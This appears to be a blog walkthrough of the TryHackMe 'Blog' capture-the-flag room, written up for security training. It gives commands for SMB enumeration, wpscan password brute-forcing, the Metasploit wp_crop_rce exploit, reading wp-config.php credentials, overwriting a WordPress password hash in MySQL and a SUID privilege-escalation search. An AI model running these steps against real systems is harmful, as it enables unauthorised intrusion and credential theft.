Amazing TryHackMe Blog Room Walktrough

Billy Joel made a WordPress blog! Can you hack it?

TryHackMe Blog Room Walktrough Billy Joel made a blog on his home computer and has started working on it.  It’s going to be so awesome!

Billy Joel WordPress Blog!

TryHackMe Blog Room

TryHackMe Blog Room Link: https://tryhackme.com/room/blog

Enumerate this box and find the 2 flags that are hiding on it!  Billy has some weird things going on his laptop.  Can you maneuver around and get what you need?  Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea 😉

TryHackMe Blog Room Walktrough

On this Lab we need to attack a WordPress blog and extract two flags and answer three questions about the system.

First I will scan the server using Nmap in order to find open ports and what services are running on each port, since we know that we are attacking a WordPress blog let’s execute gobuster to find some hidden folders.

Learning Topics:

Prepare Host Access

In order to test this machine effectively is necessary to add the host IP into our hosts file.

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ vi /etc/hosts
<IP>   blog.thm

Enumerate Host

Verify open ports and Services with Nmap

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ nmap 10.10.238.30

Enumerate Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbmap -H 10.10.238.30

Connect to Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbclient //10.10.238.30/BillySMB

Download files

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ steghide extract -sf Alice-White-Rabbit.jpg
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat rabbit_hole.txt
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool tswift.mp4
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool Alice-White-Rabbit.jpg

Enumerate WordPress Blog

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ wpscan --url http://10.10.238.30/ --passwords passwords.txt
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ use exploit/multi/http/wp_crop_rce

Privilege Escation

Read more about: Linux Privilege Escalation

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ python -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat wp-config.php
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'LittleYellow--RFS');
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ mysql -u wordpressuser -h localhost -p
wp-users table
UPDATE wp_users 
SET 
    user_pass = '$P$BedNwvQ29vr1TPd80CDl6WnHy--RFS'
WHERE
    user_nicename = "bjoel";
find / -perm -u=s -type f 2>/dev/null
www-data@blog:/var/www/wordpress$ /usr/sbin/checker